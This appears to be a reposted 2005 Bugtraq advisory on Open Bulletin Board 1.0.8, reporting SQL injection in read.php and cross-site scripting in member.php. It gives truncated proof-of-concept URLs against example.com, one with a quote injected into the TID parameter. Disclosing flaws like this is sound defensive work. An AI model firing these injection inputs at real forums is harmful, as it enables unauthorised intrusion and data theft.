QUOTE

Open Bulletin Board
www.openbb.com
Vulnerable versions: 1.0.8

* OpenBB read.php SQL Injection Vulnerability

Proof of concept:
http://www.example.com/openbb/read.php?act...tpost&TID='
http://www.example.com/openbb/read.php?TID='

* OpenBB member.php Cross-Site Scripting Vulnerability

Proof of concept:
http://www.example.com/member.php?action=l...</script>



Source: http://seclists.org/lists/bugtraq/2005/May/0174.html